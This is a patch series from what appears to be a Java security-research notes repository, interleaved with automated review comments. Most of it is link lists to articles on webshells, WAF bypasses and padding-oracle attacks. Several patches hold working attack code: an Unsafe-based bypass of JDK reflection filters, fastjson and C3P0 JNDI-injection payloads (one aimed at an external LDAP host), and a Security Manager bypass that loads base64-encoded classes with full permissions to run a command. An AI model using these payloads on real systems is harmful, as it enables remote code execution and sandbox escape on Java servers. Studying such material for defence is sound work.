--git a/Jdk/Readme.md b/Jdk/Readme.md new file mode 100644 index 0000000..7366273 --- /dev/null +++ b/Jdk/Readme.md 
@@ -0,0 +1,65 @@ +# JDK + +jdk>12不能反射修改下面class的成员。 +![image](https://user-images.githubusercontent.com/63966847/194300821-dd1bf0bc-b5bd-4680-aa35-49a5d4c8adb4.png) +思路是通过unsafe api去修改Reflection类的成员,赋值为null. +```java + +import sun.misc.Unsafe; +import java.io.ByteArrayOutputStream; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.HashMap; + +public class bypass { + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } + public static byte[] readInputStream(InputStream inputStream) { + byte[] temp = new byte[4096]; + int readOneNum = 0; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + try { + while ((readOneNum = inputStream.read(temp)) != -1) { + bos.write(temp, 0, readOneNum); + } + inputStream.close(); + }catch (Exception e){ + } + return bos.toByteArray(); + } + + public void bypassReflectionFilter()throws Exception{ + Unsafe unsafe = getUnsafe(); + Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection"); + byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class")); + //定义一个类,但不让类加载器知道它。 + Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); + + Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); + Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + + if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); + } + if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + } + } + public static void main(String[] args) throws 
Exception{ + //绕过Java 反射过滤获取ClassLoader私有字段 + //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错 + new bypass().bypassReflectionFilter(); + ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass + } +} +``` +参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java From 9cee9aeea248680dbeb95778f4d4a273d11ff974 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:31:45 +0800 Subject: [PATCH 063/257] Update Readme.md --- Jdk/Readme.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index 7366273..fd5b9b0 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md @@ -45,14 +45,15 @@ public class bypass { Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); - Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + //不需要 + //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); } - if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ - unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); - } + //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + //} } public static void main(String[] args) throws Exception{ //绕过Java 反射过滤获取ClassLoader私有字段 From 1e6185235b32c44dd0c0db653714953e0f592fc5 Mon Sep 17 00:00:00 2001 
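Review bot: In the `Jdk/Readme.md` file created by PATCH 062, the description and the code disagree: the prose says the `Reflection` members are set to null (`赋值为null`), but `bypassReflectionFilter()` writes `new HashMap()` into `fieldFilterMap` and `methodFilterMap`. The stated range `jdk>12` also needs an upper bound, since `Unsafe.defineAnonymousClass` was removed in JDK 17; record the JDK versions this was actually run on.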
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:03:47 +0800 Subject: [PATCH 064/257] Create Readme.md --- JVM/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 JVM/Readme.md diff --git a/JVM/Readme.md b/JVM/Readme.md new file mode 100644 index 0000000..5c66caf --- /dev/null +++ b/JVM/Readme.md @@ -0,0 +1,5 @@ +# JVM + +>自己在学习jvm这本书会记录其中的知识点. + ++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/) From 762b14c6e3e27b999147cce0112801ea4af2deae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:04:22 +0800 Subject: [PATCH 065/257] Delete jndi-gadgets.md --- jndi-gadgets.md | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 jndi-gadgets.md diff --git a/jndi-gadgets.md b/jndi-gadgets.md deleted file mode 100644 index bad3ffb..0000000 --- a/jndi-gadgets.md +++ /dev/null 
@@ -1,33 +0,0 @@ -``` -{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} - -{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} - -InputStream in = new FileInputStream("C3P0.ser"); -byte[] data = toByteArray(in); -in.close(); -String HexString = bytesToHexString(data, data.length); -String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; -System.out.println(poc); - -public static byte[] toByteArray(InputStream in) throws IOException { - byte[] classBytes; - classBytes = new byte[in.available()]; - in.read(classBytes); - in.close(); - return classBytes; -} - -public static String bytesToHexString(byte[] bArray, int length) { - StringBuffer sb = new StringBuffer(length); - for(int i = 0; i < length; ++i) { - String sTemp = Integer.toHexString(255 & bArray[i]); - if (sTemp.length() < 2) { - sb.append(0); - } - - sb.append(sTemp.toUpperCase()); - } - return sb.toString(); -} -``` From 4459f1ac2c68be882cab1c9482f093b18b02b532 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:06:09 +0800 Subject: [PATCH 066/257] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7a7d092..afcf094 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,8 @@ + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 From 8673174ad5c42e9c1cb265472803a566adf6fcef Mon Sep 17 00:00:00 2001 
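Review bot: In the PATCH 066 `README.md` hunk, the new entry links to `(JDK)`, but PATCH 062 created the directory as `Jdk/` (`Jdk/Readme.md`). Paths are case-sensitive on GitHub, so the link should be `(Jdk)`, or the directory should be renamed to match.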
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:17:05 +0800 Subject: [PATCH 067/257] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 41c4596..0bc0205 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -25,3 +25,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) ++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** From 5e0164f00de0a38b9bcca1d1d0aea0259c7fe62c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:18:03 +0800 Subject: [PATCH 068/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3625db3..368e047 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -172,3 +172,4 @@ + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) ++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 6d147dde23625d4cd2330f05326625ab242f269a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 21:30:19 +0800 Subject: [PATCH 069/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 368e047..d01111e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
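Review bot: The WeChat link added in PATCH 068 (`java日常/Readme.md`) still carries the share-tracking query parameters `mpshare`, `scene`, `srcid`, `sharer_sharetime` and `sharer_shareid`, and the same `sharer_shareid` value recurs in other entries of this list, which ties them all to one sharing account. Trim the URL to the `__biz`, `mid`, `idx` and `sn` parameters before committing.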
@@ -173,3 +173,4 @@ + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) From 85590784b125ec6df20b93a445346f87a5bd2f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 10 Oct 2022 17:01:17 +0800 Subject: [PATCH 070/257] Create BypassOfCreateClassLoader.java --- BypassSM/BypassOfCreateClassLoader.java | 54 +++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 BypassSM/BypassOfCreateClassLoader.java diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java new file mode 100644 index 0000000..21ec80e --- /dev/null +++ b/BypassSM/BypassOfCreateClassLoader.java 
@@ -0,0 +1,54 @@ +package com.evil; + +import java.security.*; +import java.security.cert.Certificate; + +public class MyPoc { + //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy + static { + try { + Exp(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void Exp() throws Exception{ + BypassClassLoader0 bypassClassLoader = new BypassClassLoader0(); + Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass"); + 
bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1"); + Class.forName(aClass0.getName(), true, bypassClassLoader); + } + + public static byte[] base64Decode(String bs) throws Exception { + Class base64; + byte[] value = null; + try { + base64 = Class.forName("java.util.Base64"); + Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); + value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e) { + try { + base64 = Class.forName("sun.misc.BASE64Decoder"); + Object decoder = base64.newInstance(); + value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e2) { + } + } + return value; + } + + public static class BypassClassLoader0 extends ClassLoader{ + public Class get(byte[] b,String name) { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + 
//设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null); + return super.defineClass(name, b, 0, b.length,pd); + } + } + + public static void main(String[] args) { + + } +} From 6217236b2173ab841592262c9afb274e370edcea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Oct 2022 23:44:18 +0800 Subject: [PATCH 071/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d01111e..47eaea1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -174,3 +174,4 @@ + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) ++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** From 496002a3fd1a6b269809251196271e9a5f6aac66 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Oct 2022 14:32:12 +0800 Subject: [PATCH 072/257] Create Readme.md --- Jdk/dnsrebinding/Readme.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 Jdk/dnsrebinding/Readme.md diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md new file mode 100644 index 0000000..cf62f1a --- /dev/null +++ b/Jdk/dnsrebinding/Readme.md 
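Review bot: `Exp()` in `BypassSM/BypassOfCreateClassLoader.java` (PATCH 070) loads `evilClass` and `evilClass$1` from two inline base64 strings, and the patch contains no source for either, so what they do cannot be reviewed without decoding the blobs. Commit the Java source of those classes next to this file, and include the `bypass-by-createclassloader.policy` file that the comment with the JVM flags refers to, which is also absent from the patch.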
@@ -0,0 +1,13 @@ +# java rebinding + +http://www.loongten.com/2020/02/26/dns-rebinding-bypass + +http://www.lpnote.com/2018/11/23/java-dns-cache/ + +https://www.xmanblog.net/java-dns-rebinding-ssrf/ + +https://paper.seebug.org/390/ + +https://powerdns.org/hello-dns/ + +http://www.ruanyifeng.com/blog/2016/06/dns.html From 795475bb6737abce9f7fed6aca3a9e8df3f135d8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 14 Oct 2022 20:46:01 +0800 Subject: [PATCH 073/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47eaea1..98eec1b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -175,3 +175,4 @@ + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** ++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** From b6f2ec66e83eb4a1d835b789d55e48c6feb4948b Mon Sep 17 00:00:00 2001 
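Review bot: The new `Jdk/dnsrebinding/Readme.md` in PATCH 072 is six bare URLs with no titles and no note on what each one covers, unlike the dated, annotated entries in `java日常/Readme.md`. Use the article title as link text and add a line on which part of the Java DNS cache or rebinding behaviour each reference explains; three of the links are also plain `http://`.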
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 22:01:26 +0800 Subject: [PATCH 074/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 98eec1b..9267955 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -176,3 +176,4 @@ + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** ++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** From cb24f175dd69d6140d74e1e42ae29b2850ef0bab Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 23:27:10 +0800 Subject: [PATCH 075/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9267955..cb7da58 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -177,3 +177,4 @@ + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** ++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) From c22255f37bd0f93746997bc51c0308ea2a2aa4f4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 12:43:47 +0800 Subject: [PATCH 076/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb7da58..81a54e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -178,3 +178,4 @@ + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) ++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** From 5b3bed1865a4acf8e139ed2934bdd08040b3f441 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 23:10:53 +0800 Subject: [PATCH 077/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 81a54e9..39d0e80 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
